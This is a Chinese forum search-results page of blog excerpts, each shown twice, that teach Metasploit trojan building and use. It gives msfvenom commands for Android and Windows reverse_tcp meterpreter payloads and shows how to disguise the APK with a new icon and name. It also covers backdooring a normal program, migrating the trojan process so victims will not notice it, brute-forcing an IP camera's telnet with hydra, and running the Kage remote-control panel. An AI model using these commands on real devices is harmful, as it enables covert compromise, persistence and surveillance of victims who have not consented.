搜索论坛
显示结果为标签'msfconsole'或'渗透测试'。
-
一:生成一个android木马命令: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=5555 R > bbskali.apk如图,将会生成一个名为bbskali的apk 二:反编译生成的木马命令: apktool d bbskali.apk 三:修改木马图片 1.1:先下载一个格式为png格式的图标。1.2:在res新建 drawable 将png格式图片放到里面 1.3:修改AndroidManifest.xml文件,打开文件在里面新添一句代码 <application android:icon="@drawable/icon" android:label="@string/app_name">将原来的<application android:label="@string/app_name">删除 修改完成后,保存文件。 三:修改木马的名称打开文件res-values-strings.xml文件,修改为你自己的名称 四:回编木马命令: apktool b bbskali 新的木马文件生成在dist目录下,ok,现在木马还不能用。我们需要重新签名。 五:木马签名将生的木马复制到本地,我们用安卓签名软件进行签名 六:手机安装木马效果如下: 安装运行 七:运行木马 终端获得shell 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/184.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
-
一:生成一个android木马命令: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=5555 R > bbskali.apk如图,将会生成一个名为bbskali的apk 二:反编译生成的木马命令: apktool d bbskali.apk 三:修改木马图片 1.1:先下载一个格式为png格式的图标。1.2:在res新建 drawable 将png格式图片放到里面 1.3:修改AndroidManifest.xml文件,打开文件在里面新添一句代码 <application android:icon="@drawable/icon" android:label="@string/app_name">将原来的<application android:label="@string/app_name">删除 修改完成后,保存文件。 三:修改木马的名称打开文件res-values-strings.xml文件,修改为你自己的名称 四:回编木马命令: apktool b bbskali 新的木马文件生成在dist目录下,ok,现在木马还不能用。我们需要重新签名。 五:木马签名将生的木马复制到本地,我们用安卓签名软件进行签名 六:手机安装木马效果如下: 安装运行 七:运行木马 终端获得shell 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/184.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
-
一:利用msfconsole生成windows木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -e x86/33 -f exe -o yue.exe参数说明: -p:指定生成的类型lhost:攻击者的ip地址lport:攻击者的端口-e:木马的编码方式-f:生成的文件格式-o:输出文件 二:利用msfconsole攻击配置参数: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.129 set LPORT 4444 exploit 三:windows运行木马 成功得到反弹 具体攻击细节,我们将会在第二节演示! 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/300.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
-
一:利用msfconsole生成windows木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -e x86/33 -f exe -o yue.exe参数说明: -p:指定生成的类型lhost:攻击者的ip地址lport:攻击者的端口-e:木马的编码方式-f:生成的文件格式-o:输出文件 二:利用msfconsole攻击配置参数: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.129 set LPORT 4444 exploit 三:windows运行木马 成功得到反弹 具体攻击细节,我们将会在第二节演示! 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/300.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
-
前言发现一款摄像头,抱着好奇的心态,开始了漫长的渗透之路。 扫描目标及端口扫描目标: nmap -P0 192.168.6.1/24发现设备192.168.6.102为新设备,我们对此ip进行端口扫描 端口扫描: nmap -T4 -A 192.168.6.102 效果如下: 我们可以看到,当前开启的端口有21 23 80 30000等端口。 访问80端口 提示安装插件,嗯……懒得安装,接着来 既然开启了21和23端口,这说明存在ftp和telnet服务,我们尝试弱口令登录。 然而,并没有卵用。 尝试暴力破解新建一个my.txt字典,尝试暴力破解 hydra 192.168.6.102 telnet -l admin -P /root/my.txt -V 恩,还是没结果,别放弃,接着来! 在扫描端口的时候,发现存在30000端口,恩,这是什么鬼,看看! 浏览器访问30000端口 出现一串神秘的字符,等等,这串字符是不是设备的ID呢?带着这个设想,我下载了他们产品的APP 如图,输入设备id,账号和密码默认! 点击保存,激动人心的提示保存成功。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/314.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
-
前言发现一款摄像头,抱着好奇的心态,开始了漫长的渗透之路。 扫描目标及端口扫描目标: nmap -P0 192.168.6.1/24发现设备192.168.6.102为新设备,我们对此ip进行端口扫描 端口扫描: nmap -T4 -A 192.168.6.102 效果如下: 我们可以看到,当前开启的端口有21 23 80 30000等端口。 访问80端口 提示安装插件,嗯……懒得安装,接着来 既然开启了21和23端口,这说明存在ftp和telnet服务,我们尝试弱口令登录。 然而,并没有卵用。 尝试暴力破解新建一个my.txt字典,尝试暴力破解 hydra 192.168.6.102 telnet -l admin -P /root/my.txt -V 恩,还是没结果,别放弃,接着来! 在扫描端口的时候,发现存在30000端口,恩,这是什么鬼,看看! 浏览器访问30000端口 出现一串神秘的字符,等等,这串字符是不是设备的ID呢?带着这个设想,我下载了他们产品的APP 如图,输入设备id,账号和密码默认! 点击保存,激动人心的提示保存成功。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/314.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
-
在利用msf进行渗透测试时,或者我们将我们自己的木马发送给受害者时,由于我们的木马是临时性的,不能很好的保持持久在线,导致渗透过程失败。那么我们该如何解决这一问题呢!其实方法也很简单,我们只需要将木马的进程转移到其他的程序上即可。这样做一来是防止受害者发现可疑进程而关闭后门程序,二是可以有效的保持木马在线。首先我们生成一个木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -x 图标修改器.exe -e x86/33 -f exe -o yue.exe如上我们在一个正常的软件图标修改器.exe加入了后门,当受害者运行该软件时,我们则会获得shell。 启动msfconsole并设置参数use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.195 set LPORT 5555 exploit运行软件,成功获得shell 转移进程首先命令ps查看当前windows下运行的进程有哪些。 这时,我们要记录下要转移程序的pid值 比如,我想我木马的进程转移到txt文档程序下。执行下面命令。 migrate 6296 使用 espiause espia 这样我们将原来的木马进程转移到了windonds自带的应用程序上。操作更简单,装逼更安全。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/531.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
-
在利用msf进行渗透测试时,或者我们将我们自己的木马发送给受害者时,由于我们的木马是临时性的,不能很好的保持持久在线,导致渗透过程失败。那么我们该如何解决这一问题呢!其实方法也很简单,我们只需要将木马的进程转移到其他的程序上即可。这样做一来是防止受害者发现可疑进程而关闭后门程序,二是可以有效的保持木马在线。首先我们生成一个木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -x 图标修改器.exe -e x86/33 -f exe -o yue.exe如上我们在一个正常的软件图标修改器.exe加入了后门,当受害者运行该软件时,我们则会获得shell。 启动msfconsole并设置参数use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.195 set LPORT 5555 exploit运行软件,成功获得shell 转移进程首先命令ps查看当前windows下运行的进程有哪些。 这时,我们要记录下要转移程序的pid值 比如,我想我木马的进程转移到txt文档程序下。执行下面命令。 migrate 6296 使用 espiause espia 这样我们将原来的木马进程转移到了windonds自带的应用程序上。操作更简单,装逼更安全。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/531.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
-
Kage,一个把msf变成可视化远控平台的工具。项目地址https://github.com/WayzDev/Kage/ 下载安装点我下载哈~ 下载后,给予运行权限。 启动服务msfrpcd -U msf -P 123456 -a 0.0.0.0 参数说明: -U: 登录kage的账号 -P:登录kage的密码 -a: msf的ip地址(很重要,要是kage和msf在同一台电脑,用0.0.0.0即127.0.0.1) 启动程序 并登陆 ./Kage.0.1.1-beta_linux.AppImage 输入账号和密码 以及对应的端口 登录成功后如下所示 我们可以利用命令生成木马,也可以在平台上生成木马,根据自己的具体情况来看。 配置监听 配置完成后点击创建 在目标端 成功运行生成的木马,查看会话。 各种骚操作系统信息 文件信息 路由信息 装B完成 扯呼~~~ 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/1263.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
-
Kage,一个把msf变成可视化远控平台的工具。项目地址https://github.com/WayzDev/Kage/ 下载安装点我下载哈~ 下载后,给予运行权限。 启动服务msfrpcd -U msf -P 123456 -a 0.0.0.0 参数说明: -U: 登录kage的账号 -P:登录kage的密码 -a: msf的ip地址(很重要,要是kage和msf在同一台电脑,用0.0.0.0即127.0.0.1) 启动程序 并登陆 ./Kage.0.1.1-beta_linux.AppImage 输入账号和密码 以及对应的端口 登录成功后如下所示 我们可以利用命令生成木马,也可以在平台上生成木马,根据自己的具体情况来看。 配置监听 配置完成后点击创建 在目标端 成功运行生成的木马,查看会话。 各种骚操作系统信息 文件信息 路由信息 装B完成 扯呼~~~ 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/1263.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。